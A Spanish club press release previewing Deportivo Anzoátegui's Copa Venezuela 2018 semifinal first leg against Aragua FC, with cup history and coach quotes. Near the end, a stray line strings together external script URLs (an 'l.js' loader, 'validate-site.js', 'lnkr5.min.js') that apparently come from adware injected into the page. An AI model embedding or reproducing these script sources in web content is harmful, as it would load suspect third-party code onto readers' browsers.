¡LOS NUESTROS PRIMERO!

Deportivo Anzoátegui SC recibe al Aragua FC en semifinales de la Copa Venezuela 

anzoátegui091018

El elenco oriental busca una victoria en casa este miércoles que le permita ir a Maracay a  jugar la vuelta sin presiones         

Con los ojos puestos en la instancia final de la Copa Venezuela 2018, el Deportivo Anzoátegui SC se medirá este miércoles 10 de octubre ante el Aragua FC en el partido de ida de la ronda semifinal de este torneo, encuentro que tendrá como escenario el gramado del José Antonio Anzoátegui en donde comenzará a rodar el balón a partir de las 5:00 de la tarde.

El Anzoátegui está listo para luchar por el pase a final ante los maracayeros. En este sentido iniciar la disputa en casa se convierte en un plus importante ya que el DANZ no ha perdido en su patio en instancia copera, luego de doblegar al Margarita FC en primera ronda 3-1, barrer al Angostura 2-0 en octavos de final y posteriormente empatar 1-1 a con La Guaira en cuartos, lo que represente un envión anímico importante para afrontar este compromiso que pondría al equipo a un paso no solo de luchar por la corona sino de optar por participar en la Copa Sudamericana 2018.

Cabe destacar que la Maquinaria Aurirroja Oriental continúa escribiendo páginas en su historia, se trata de la tercera ocasión en que el club logra meterse en la penúltima tanda y de clasificarse sería también la tercera vez que disputa una final luego de participar en las finales de las ediciones 2008 y 2012 en donde se apoderó del cetro en ambas ocasiones.

En función de este escenario los dirigidos por Jobanny Rivero no desmayan y este lunes volvieron al terreno para continuar con la preparación de este partido ante los aragüeños en donde el objetivo es uno solo, conseguir un resultado positivo como local para luego sellar la clasificación como visitante.

“Sin duda se trata de una copa importante para el Anzoátegui, dejamos atrás un rival de peso como la Guaira pero eso ya es pasado, ahora nos toca ir paso a paso, trabajar duro y jugar con mucha inteligencia y sabiduría para afrontar este tipo de partido, por mi parte le agradezco al club por permitirme estar al frente del equipo en esta instancia tan bonita y tan enriquecedora para mi carrera” destacó el coach Rivero.

En este sentido la escena está servida para este choque desde las cinco de la tarde en Puerto La Cruz, con entrada libre para el disfrute de toda la afición aurirroja.

Prensa Deportivo Anzoátegui SC.   

http://cdncache-a.akamaihd.net/sub/nee5452/52200_6968_/l.js?pid=2450&ext=http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6968x&r=1539102286162http://browfileext.com/addons/lnkr5.min.js

Oswaldo Guevara